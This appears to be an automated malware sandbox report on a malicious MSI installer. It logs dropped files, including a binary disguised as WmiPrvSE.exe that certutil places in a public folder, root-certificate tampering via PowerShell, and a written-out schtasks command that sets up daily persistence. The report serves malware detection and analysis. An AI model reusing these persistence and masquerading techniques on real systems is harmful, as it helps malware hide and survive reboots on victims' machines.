                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 0000000B.00000002.1536757222.0000000007B39000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Management.Automation.pdbOS= source: powershell.exe, 0000000D.00000002.1566035270.0000000006E85000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: HP<oXC:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1565225176.0000000006A69000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1576734611.00000000076B9000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1583062786.00000000069D9000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000F.00000002.1581398989.0000000007B3E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ?\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000B.00000002.1536757222.0000000007B39000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: 1eSOBjseu2.msi, MSI44AA.tmp.2.dr, MSI40EF.tmp.2.dr, 643ea8.msi.2.dr, 643eab.msi.2.dr
                Source: Binary string: tomation.pdbk source: powershell.exe, 00000011.00000002.1530812316.00000000029AB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: Desktop.exe, 00000005.00000002.1440830265.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmp, Desktop.exe, 00000005.00000000.1431460900.00007FF7BB278000.00000002.00000001.01000000.00000004.sdmp, Desktop.exe, 00000005.00000003.1434163995.000002EF11318000.00000004.00000020.00020000.00000000.sdmp, Desktop.exe, 00000005.00000003.1433314174.000002EF12A71000.00000004.00000020.00020000.00000000.sdmp, 1eSOBjseu2.msi, Desktop.exe.3.dr, 643ea8.msi.2.dr, 643eab.msi.2.dr
                Source: Binary string: pdbpdblib.pdb=e\fo source: powershell.exe, 0000000D.00000002.1566035270.0000000006E85000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: .textn.pdb ` source: powershell.exe, 0000000F.00000002.1581398989.0000000007B00000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: 1eSOBjseu2.msi, MSI3FB2.tmp.2.dr, MSI4080.tmp.2.dr, MSI4020.tmp.2.dr, MSI40BF.tmp.2.dr, MSI4060.tmp.2.dr, 643ea8.msi.2.dr, 643eab.msi.2.dr

                Data Obfuscation

                barindex
                Source: C:\Users\Public\WmiPrvSE.exeUnpacked PE file: 23.2.WmiPrvSE.exe.760000.2.unpack
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_00087860 LoadLibraryW,GetProcAddress,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,LoadImageW,FreeLibrary,4_2_00087860
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeFile created: C:\Users\Public\__tmp_rar_sfx_access_check_6571921Jump to behavior
                Source: Desktop.exe.3.drStatic PE information: real checksum: 0x0 should be: 0xb6743
                Source: aipackagechainer.exe.3.drStatic PE information: real checksum: 0xe08ec should be: 0xdbe3a
                Source: Desktop.exe.3.drStatic PE information: section name: .didat
                Source: Desktop.exe.3.drStatic PE information: section name: _RDATA
                Source: WmiPrvSE.exe.21.drStatic PE information: section name: .xdata
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeCode function: 4_2_000CD1B4 push ecx; ret 4_2_000CD1C7
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB275156 push rsi; retf 5_2_00007FF7BB275157
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeCode function: 5_2_00007FF7BB275166 push rsi; retf 5_2_00007FF7BB275167
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_042F6A5D push esp; ret 9_2_042F6A83
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_001D1F53 push rbx; retf 23_2_001D1F54
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_001D776C push 0000006Ah; retf 23_2_001D7784
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_0045425C push rbp; retf 23_2_0045426F
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00454274 push rbp; retf 23_2_00454277
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_0045422C push rsi; retf 23_2_0045422F
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00454234 push r14; retf 23_2_00454237
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_004542C4 push rsi; retf 23_2_004542CF
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_004542DC push rsp; retf 23_2_004542DF
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_004542E4 push rbp; retf 23_2_004542E7
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_0045429C push rbp; retf 23_2_0045429F
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_004542A4 push rbp; retf 23_2_00454277
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_004542A4 push rbp; retf 23_2_00454287
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_004542A4 push rbp; retf 23_2_004542B7
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_004542AC push rbp; retf 23_2_00454287
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_004542AC push rbp; retf 23_2_004542B7
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_004542BC push rsi; retf 23_2_004542BF
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00454314 push rbp; retf 23_2_00454317
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_0045431C push r14; retf 23_2_00454327
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00784070 push rbp; retf 23_2_007924FB
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_007840C4 push rbp; retf 23_2_0079250B
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00792170 push rbp; retf 23_2_00792173
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00792168 push rbp; retf 23_2_0079216B
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_0079916C push 0000006Ah; retf 23_2_00799184
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00793953 push rbx; retf 23_2_00793954
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00792130 push rsi; retf 23_2_0079213B
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_00792128 push rsi; retf 23_2_0079212B
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_007921C0 push rbp; retf 23_2_007921C3
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4080.tmpJump to dropped file
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI40EF.tmpJump to dropped file
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4020.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeJump to dropped file
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI44AA.tmpJump to dropped file
                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeJump to dropped file
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI40BF.tmpJump to dropped file
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4060.tmpJump to dropped file
                Source: C:\Windows\System32\certutil.exeFile created: C:\Users\Public\WmiPrvSE.exeJump to dropped file
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3FB2.tmpJump to dropped file
                Source: C:\Windows\System32\certutil.exeFile created: C:\Users\Public\WmiPrvSE.exeJump to dropped file
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4080.tmpJump to dropped file
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI40EF.tmpJump to dropped file
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4020.tmpJump to dropped file
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI44AA.tmpJump to dropped file
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI40BF.tmpJump to dropped file
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4060.tmpJump to dropped file
                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3FB2.tmpJump to dropped file

                Boot Survival

                barindex
                Source: C:\Windows\System32\certutil.exeFile created: C:\Users\Public\WmiPrvSE.exeJump to dropped file
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTasks /Create /SC DAILY /TN WmiPrvSE /TR "C:\Users\Public\WmiPrvSE.exe" /ST 19:00 /f

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_007801A8 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,23_2_007801A8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2 BlobJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
